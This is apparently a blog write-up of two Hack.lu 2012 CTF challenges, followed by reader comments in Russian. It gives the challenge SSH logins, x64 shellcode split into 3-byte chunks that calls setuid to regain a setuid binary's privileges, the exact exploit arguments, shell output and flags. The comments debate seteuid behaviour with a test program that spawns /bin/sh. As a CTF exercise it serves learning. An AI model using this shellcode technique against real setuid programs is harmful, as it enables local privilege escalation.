Hack.lu 2012 CTF Challenge #14-15 (150+250)

14 – Safehouse

It’s the middle of the night. Nothing but complete darkness and the moaing of approaching zombies surrounds you. You need to escape. Fast. There seems to be nothing to hide and nowhere to run. But then – a small dancing gleam appears while you are running through the blackness. Could it be? Yes – it looks like the light of a safehouse, now a few meters away. You need to get in, you need to survive. But it’s locked. Looks like you need a special knocking sequence to enter. But how to get it? You have to be fast to get into safety. The Zombies are getting closer …

SSH: ctf.fluxfingers.net
PORT: 2092
USER: ctf
PASS: js8pps991xsgyy7
binary

15 – Secure Safehouse

It’s past midnight now. The zombies managed to invade your safehouse and you needed to escape. Again. Seems like the imprudent security measures had their price. But there is hope! Rumor has it there’s another safehouse which proves to be more secure, employing security measures no zombie would ever figure out. But can you?

SSH: ctf.fluxfingers.net
PORT: 2093
USER: ctf
PASS: xbshsya8ksUs7
binary

Summary: x64 shellcoding

This x64 linux binary is quite simple. First, it drops effective privilegies. We can regain them, but only if we’ll do setuid before execve.

Then, it allocates an ‘rwx‘ area and copies there 5 qwords (actually 4 dwords + 1 qword because they overlap).
Qwords are taken from strtoul(argv[i]).
Each 4th byte of each qword is then set to 0xc3 (ret opcode).

Then the code is executed – each dword one time. After it we get shell.

So, we need to write at max 6 blocks of 3-byte shellcodes to do setuid(1006):

mov ah, 0x03  ; high byte of 1006
nop
db 0xc3
 
mov al, 0xee  ; low byte of 1006
nop
db 0xc3
 
push byte 0x69 ; sys_setuid
pop rbx
db 0xc3
 
xchg eax, edi
jmp metka
db 0xc3
 
metka:
xchg eax, ebx
syscall
db 0xc3
$ ./safehouse 948 61104 5990762 125847 331667
$ id
uid=1000(ctf) gid=1000(ctf) euid=1006(safehouse) groups=1006,1000(ctf)
$ cat FLAG
FUNNY_C3_LOOP_MAKES_ZOMBIES_BUTTHURT

Secure Safehouse

Here the code is the same, but only the first dword is run, once. Also there’s a check:
(eax == argc - 1)

So we replace nop; ret with mov dl, 0xc3 and also fix eax in the end:

mov ah, 0x03 ; 1005 high byte
mov dl, 0xc3 ; B2C3 opcode
 
mov al, 0xed ; 1005 low byte
mov dl, 0xc3
 
mov cl, 0x69 ; sys_setuid
mov dl, 0xc3
 
xchg eax, edi
xchg eax, ecx
mov dl, 0xc3
 
; qword
syscall      ; 0F05 opcode
mov dl, 0xc3
mov al, 5    ; to match argc
ret          ; C3
$ ./secure-safehouse 11666356 11726256 11692465 11702679 54893877214184719
$ id
uid=1000(ctf) gid=1000(ctf) euid=1005(secure_safehouse) groups=1005,1000(ctf)
$ cat FLAG
JOO_ARE_NOW_SUPER_LEET_C3_HECKER

8 comments

Skip to comment form

  1. почему на их машине сделать setuid(1006): было достаточно, а ни на одной из моих машин – нет?

    тестовый сэмпл:
    #include

    int main() {
    uid_t u = getuid();
    seteuid(u);

    __asm (“xor %rax, %rax;”
    “mov $0x69,%al; ”
    “mov $1005, %rdi;”
    “syscall”);

    char *arg[] = {“/bin/sh”, NULL};
    execve(“/bin/sh”, arg, NULL);
    }

    права на файл:
    -rwsr-sr-x 1 alice bay 7984 окт. 26 18:21 1

    id alice:
    uid=1005(alice) gid=1005(alice) groups=1005(alice)

    $ ./1
    sh-4.2$ id
    uid=1000(bay) gid=1000(bay) groups=1000(bay),10(wheel),16(cron),18(audio),19(cdrom),27(video),35(games),102(crontab),997(vboxusers)

    я решал через setresuid

    1. а strace чего говорит? setuid что возвращает?

      1. а тьфу он ничего не скажет, suid же )

      2. кстати strace’ом можно проверить как seteuid(u) отрабатывает
        у меня делает setresuid32(-1, 1000, -1) может в какойто libc он все 3 уида выставляет?

    2. А во, из мана seteuid:
      Under libc4, libc5 and glibc 2.0 seteuid(euid) is equivalent to setreuid(-1, euid) and hence may change the saved set-user-ID. Under glibc 2.1 and later it is equivalent to setresuid(-1, euid, -1) and hence does not change the saved set-user-ID.

      1. странно, на машине ctf.fluxfingers.net:2092 strace говорит, что выполняется setresuid(-1, 1000, -1), на моих машинах тоже самое

        1. strace: http://alexbers.com/strace.log

            • hellman on October 27, 2012 at 21:30
              Author

            Даж хз :) Магия какая-то

Leave a Reply to bay Cancel reply

Your email address will not be published.